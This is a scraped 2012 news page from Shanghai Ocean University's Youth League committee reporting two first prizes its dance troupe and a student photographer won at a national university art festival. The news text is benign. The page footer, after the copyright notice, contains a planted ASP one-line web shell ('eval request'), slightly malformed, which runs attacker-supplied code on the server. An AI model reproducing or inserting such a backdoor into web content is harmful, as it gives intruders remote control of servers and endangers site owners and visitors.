当前位置:共青团上海海洋大学委员会 >> 学生组织 >> 校艺术团 >> 正文  
站内信息搜索:
我校学子获全国第三届大学生艺术展演两项金奖
[2012年02月29日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

由教育部主办、杭州市人民政府承办的全国第三届大学生艺术展演活动日前在杭州落下帷幕。我校舞蹈《紫禁流云》(原创)荣获全国一等奖、优秀创作奖,爱恩学院学生曾文俊同学的摄影作品《上海》荣获全国一等奖。黄晞建副书记作为上海派出的3位校长之一参加大学校长美育论坛。
本届大艺展以“青春,使命”为主题。包含11项活动,即声乐、舞蹈、器乐、戏剧等4个艺术表演项目的现场比赛,以及艺术作品展、高校校长书画摄影作品展、艺术教育科研论文报告会、大学校长美育论坛、开幕式、闭幕式和青春大舞台等。
我校舞蹈团经过一年多时间的精心准备、刻苦排练,从各省市报送全国的253件舞蹈作品中脱颖而出,于2月8日参加了艺术表演项目舞蹈专场的现场展演比赛,最终用她们最真诚美丽的表演,取得了全国甲组一等奖以及优秀创作奖的优异成绩。
作为此次大艺展活动的主体组成部分,艺术作品展同时在中国美术学院美术馆中举行。我校曾文俊同学的摄影作品《上海》,作为上海高校参与全国艺术作品展3件作品之一,其展现的上海的城市特质与风景,得到了许多参观人员的好评并获得一等奖的佳绩。
据了解,全国大学生艺术展演每三年举办一次,是我国目前规格最高、规模最大、影响最广的大学生艺术盛会,把握了当代大学生艺术的风向标,为进一步的艺术学习提供了重要导向。我校艺术团的同学们用他们实际行动与努力实现着自己的价值,用优异的成绩为海洋大学百年校庆献礼。

(撰稿:何杉)

 

关闭窗口

上一篇:我校舞蹈团首登全国大学生艺术展演决赛舞台

下一篇:没有了
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>